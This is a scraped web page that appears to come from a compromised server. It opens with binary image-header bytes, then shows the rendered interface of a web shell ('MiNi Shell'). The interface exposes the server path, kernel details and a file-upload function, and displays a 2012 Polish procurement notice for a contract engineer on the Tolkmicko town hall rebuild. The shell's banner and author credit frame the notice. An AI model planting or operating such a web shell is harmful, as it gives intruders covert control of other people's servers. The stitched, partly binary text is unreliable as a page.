JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120419/124936-N-2012.html

<p class="kh_header"><b>Tolkmicko: Pełnienie usługi Inżyniera Kontraktu na zadaniu inwestycyjnym pn.
Odbudowa układu urbanistycznego Miasta Tolkmicko ETAP I Odbudowa Ratusza Miejskiego realizowanego w systemie zaprojektuj i zbuduj</b><br>
<b>Numer ogłoszenia: 124936 - 2012; data zamieszczenia: 19.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Tolkmicko , ul. Portowa 2, 82-340 Tolkmicko, woj. warmińsko-mazurskie, tel. 055 2316121, faks 055 2316127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://tolkmicko-umig.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie usługi Inżyniera Kontraktu na zadaniu inwestycyjnym pn.
Odbudowa układu urbanistycznego Miasta Tolkmicko ETAP I Odbudowa Ratusza Miejskiego realizowanego w systemie zaprojektuj i zbuduj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zarządzanie projektem budowlanym w FAZIE PRZED REALIZACĄ ROBÓT BUDOWLANYCH weryfikacja programu funkcjonalno użytkowego  dokumentacji koncepcyjnej przedsięwzięcia budowlanego będącej w posiadaniu Zamawiającego pod kątem jej zgodności z uwarunkowaniami formalno prawnymi procesu inwestycyjnego i oczekiwaniami funkcjonalno użytkowymi Zamawiającego w tym weryfikacja pod kątem stawianych wymagań technicznych ekonomicznych architektonicznych materiałowych i funkcjonalnych jako podstawa merytoryczna opisu przedmiotu zamówienia na wybór wykonawcy na zaprojektowanie i wykonanie robót budowlanych
inicjowanie zmian, uzupełnień i innych niezbędnych czynności dotyczących dokumentacji koncepcyjnej przedsięwzięcia budowlanego w celu jej dostosowania do bieżących uwarunkowań formalno prawnych procesu inwestycyjnego i oczekiwań funkcjonalno użytkowymi Zamawiającego koordynacja procesem wprowadzania zmian i lub uzupełnień w dokumentacji koncepcyjnej przedsięwzięcia budowlanego
rekomendacja Zamawiającemu zweryfikowanej i uzupełnionej dokumentacji koncepcyjnej przedsięwzięcia budowlanego do akceptacji, zatwierdzenia i wykorzystania do potrzeb procesu kontraktowania budowlanego obsługa procesu kontraktowania wszystkich robót i usług przewidzianych w ramach efektywnej realizacji przedsięwzięcia inwestycyjnego a w tym sporządzenia projektu specyfikacji istotnych warunków zamówienia SIWZ zgodnie z wymogami Ustawy PZP w tym w szczególności opisu przedmiotu zamówienia na bazie aktualnych dokumentów merytorycznych i formalnoprawnych zatwierdzonych przez Zamawiającego projektu warunków udziału w postępowaniu projektu istotnych postanowień umowy wzór umowy sporządzanie projektu odpowiedzi na ewentualne pytania zadane przez wykonawców uczestniczących w postępowaniu przetargowym sporządzenie projektu ewentualnych zmian treści SIWZ udział u boku Zleceniodawcy w procedurze publicznego otwarcia ofert czynny udział w postępowaniu przetargowym w charakterze biegłych w tym sporządzenie audytu złożonych w postępowaniu ofert wykonawców ubiegających o zamówienie publiczne sporządzenie projektu wezwań o uzupełnienie przez wykonawców ewentualnie brakujących błędnych  wadliwych dokumentów ofertowych sporządzenie projektu wszelkich niezbędnych pism i zawiadomień wymaganych ustawą PZP w tym sporządzenia projektu zawiadomienia o wyborze oferty najkorzystniejszej sporządzenie ostatecznego tekstu aktu umowy z wybranym wykonawcą sporządzenie projektu ogłoszenia o udzieleniu zamówienia prowadzenie na bieżąco od momentu wszczęcia postępowania do jego zakończenia protokołu postępowania zgodnie z wymaganiami ustawy PZP przygotowanie projektu pism na ewentualne wystąpienia wykonawców związane ze środkami ochrony prawnej nadzór nad procesem projektowania budowlanego a w tym koordynacja procesem formułowania przez Zamawiającego szczegółowych wytycznych techniczno technologicznych a koordynacja procedurą uzgodnień formalno prawnych stron kontraktu budowlanego w zakresie projektowania budowlanego bieżący monitoring prac projektowych bieżąca sprawozdawczość o przebiegu i zaawansowaniu prac projektowych inicjowanie i kreatywny udział w naradach roboczych stron zaangażowanych w prace projektowe merytoryczne wsparcie Zamawiającego w rozwiązywaniu spraw problemowych dotyczących procesu projektowania inwestycji koordynacja procedurą akceptacji odbioru prac projektowych Zarządzanie projektem budowlanym w FAZIE REALIZACJI ROBÓT BUDOWLANYCH opracowanie wzoru dokumentów roboczych procesu budowlanego i uzyskanie akceptacji Zamawiającego, a w konsekwencji ich wdrożenie do obiegu formalnego inwestycji koordynacja procedurą przekazywania terenu budowy  koordynacja usługą nadzoru inwestorskiego egzekwowanie od projektanta członka zespołu wykonawcy kontraktu budowlanego efektywnej usługi nadzoru autorskiego organizowanie i prowadzenie narad budowy, w których uczestniczą strony kontraktu i lub uczestnicy procesu budowlanego tj. pełnomocni przedstawiciele Zamawiającego i wykonawcy robót budowlanych kierownik budowy  kierownicy robót, inspektorzy nadzoru inwestorskiego i projektanci ustalenia, których będą miały odzwierciedlenie w stosownych protokołach
bieżące dokumentowanie procesu inwestycyjnego, umożliwiające Zamawiającemu precyzyjną kontrolę nad jego przebiegiem - w zakresie i formie umożliwiającej: 
precyzyjny monitoring rzeczywistego zaawansowania rzeczowo finansowego robót na zadaniu, w każdym momencie realizacji inwestycji, jednakże nie rzadziej niż 1 raz na miesiąc kalendarzowy jakości i terminowości realizacji robót na zadaniu jakości i terminowości świadczenia przez projektanta usługi nadzoru autorskiego
zakresu i sposobu rozwiązywania bieżącej problematyki technicznej i organizacyjnej procesu budowlanego precyzyjną kwalifikację rzeczywistego wymiaru zaawansowania rzeczowo-finansowego robót na zadaniu w układzie wymaganych kategorii kosztowych rozliczenie pomocowych i budżetowych środków finansowych przeznaczonych na realizację inwestycji archiwizacja duplikatów kopii wszystkich dokumentów procesu budowlanego realizowanego w ramach: kontraktu budowlanego i usługi stanowiącej przedmiot nn. zamówienia sporządzania na piśmie comiesięcznych sprawozdań z realizacji inwestycji wraz z dokumentacją fotograficzną sporządzanie, kompletowanie i merytoryczne opiniowanie wszystkich dokumentów warunkujących bieżące płatności dla wykonawcy robót budowlanych na zasadach i w terminach określonych kontraktem budowlanym inicjowanie procedur akceptacji przez stronę zamawiającą zasadności wykonania robót zamiennych i/lub dodatkowych  poprzez przygotowanie i przedłożenie stronie zamawiającej do weryfikacji i akceptacji stosownych do okoliczności projektów dokumentów formalno prawnych informowanie na piśmie stronę zamawiającą o wszelkich faktach mających znaczenie dla realizacji inwestycji, a w tym w szczególności o ewentualnych okolicznościach mogących skutkować nieterminową realizacją kontraktu budowlanego i/lub odstąpieniem wykonawcy od jego realizacji inicjowanie ewentualnych zmian postanowień kontraktu budowlanego w kontekście okoliczności przewidzianych tymże kontraktem poprzez przygotowanie i przedłożenie stronie zamawiającej do weryfikacji i akceptacji stosownych do okoliczności projektów dokumentów formalno prawnych  bieżąca weryfikacja umownych harmonogramów rzeczowo finansowych inwestycji umożliwiająca dostosowanie procesu finansowania inwestycji do aktualnego tempa realizacji robót na zadaniu dostosowanie tempa realizacji robót na zadaniu do aktualnych możliwości procesu finansowania inwestycji bieżące podejmowanie możliwych działań zmierzających do uniknięcia sporu na tle reklamacyjnym między stronami kontraktu budowlanego inicjowanie, w razie uzasadnionych okoliczności, procedur dodatkowych badań wbudowanych materiałów, urządzeń i jakości wykonanych robót przez wykonawcę kontraktu budowlanego, tj. badań których nie przewiduje kontrakt budowlany oraz warunki techniczne wykonania i odbioru robót budowlanych na zasadach merytoryczno-finansowych określonych w kontrakcie budowlanym koordynacja działaniami stron kontraktu budowlanego w przypadku odstąpienia od niego którejś ze stron merytoryczne wsparcia strony zamawiającej w ewentualnej procedurze postępowania reklamacyjnego wszczętego w wyniku sporu pomiędzy stronami kontraktu budowlanego w tym przygotowanie stosownej dokumentacji do arbitrażu pozaksięgowa ewidencja kosztów inwestycyjnych generowanych w ramach kontraktu o roboty budowlane kontraktu o nadzór inwestorski czynne wsparcie merytoryczne strony zamawiającej w procedurze
sprawozdawczości wewnętrznej Zamawiającego i dla  Instytucji Zarządzającej Programem Pomocowym formalnego rozliczania kosztów inwestycji finansowanych ze środków budżetowych Zamawiającego i środków pomocowych aplikowania do Instytucji Zarządzającej Programem Pomocowym o wprowadzenie zmian do umowy o pomoc finansową koordynacja procedurą: odbiorów technicznych, odbiorów częściowych etapowych, rozruchów technologicznych i odbioru końcowego sporządzenie dokumentów przejęcia na majątek Zamawiającego środka trwałego stanowiącego produkt realizacji inwestycji Sprawowanie nadzoru inwestorskiego w FAZIE REALIZACJI ROBÓT BUDOWLANYCH zgodnie z art.25 i art.26 Ustawy prawo budowlane we wszystkich specjalnościach technicznych niezbędnych dla prawidłowej realizacji robót budowlanych wykonywanych w ramach przedsięwzięcia inwestycyjnego  a w tym reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie
sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających
uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywania ich do użytkowania potwierdzanie faktycznie wykonanych robót oraz usunięcia wad kontrolowanie rozliczeń budowy Obsługa inwestycji w OKRESIE GWARANCYJNYM  polegająca m. in. na czynnym udziale wszystkich uczestników procesu budowlanego reprezentujących usługodawcę w procedurze przeglądów gwarancyjnych przedmiotu inwestycji w terminach wyznaczonych przez Zamawiającego sporządzaniu stosownych protokołów z przeglądu gwarancyjnego  identyfikujących termin przeglądu, skład osobowy uczestników przeglądu, dokonane czynności kontrolne, zidentyfikowane wady przedmiotu inwestycji, zalecone sposoby i terminy usunięcia zidentyfikowanych wad oraz inne ustalenia dokonane przez uczestników przeglądu sprawdzeniu stanu realizacji zaleceń pokontrolnych przeglądu gwarancyjnego   potwierdzonych każdorazowo stosownym protokołem  zakończonym odpowiednimi  wnioskami do Zamawiającego, w tym dotyczącymi sfery karnoodszkodowawczej z tytułu roszczeń gwarancyjnych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.24.80.00-8, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w rozdziale V SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w rozdziale V SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w rozdziale V SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w rozdziale V SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany terminu umownego realizacji usługi  wynikające:
z przedłużenia terminu realizacji robót budowlanych na zadaniu  z przyczyn niezależnych od   wykonawcy usługi ze skrócenia terminu realizacji robót budowlanych na zadaniu z przyczyn ograniczenia zakresu rzeczowego inwestycji będącego skutkiem ograniczenia budżetu finansowego inwestycji
z innych nadzwyczajnych zdarzeń niezależnych od Zamawiającego, których Zamawiający nie mógł przewidzieć na etapie planowania i kontraktowania inwestycji, a które mogą mieć wpływ m. in. na efektywność: projektowania budowlanego, wykonawstwa robót budowlanych usługi będącej przedmiotem nn. zamówienia, inżynierii finansowania inwestycji oraz odbioru i wdrożenia do eksploatacji produktu realizacji inwestycji. 
zmiany wynagrodzenia Wykonawcy usługi  wynikające:
z ustawowych zmian stawki podatku VAT
ze zmian terminu umownego realizacji usługi o których mowa w pkt.a
zmiany uczestnika ów procesu budowlanego w rozumieniu Prawa budowlanego oraz innych przewidzianych umową osób zespołu Wykonawcy usługi - z przyczyn bieżących uwarunkowań prowadzonej przez Wykonawcę usługi działalności gospodarczej  z zastrzeżeniem dopuszczenia tylko tych zmian, które spełniają warunki SIWZ w zakresie dysponowania przez wykonawcę osobami zdolnymi do wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://tolkmicko-umig.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Tolkmicku 
ul. Portowa 2 
82 - 340 Tolkmicko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2012 godzina 10:15, miejsce: Urząd Miasta i Gminy w Tolkmicku 
ul. Portowa 2 
82 - 340 Tolkmicko
pok. Nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Warmia i Mazury na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com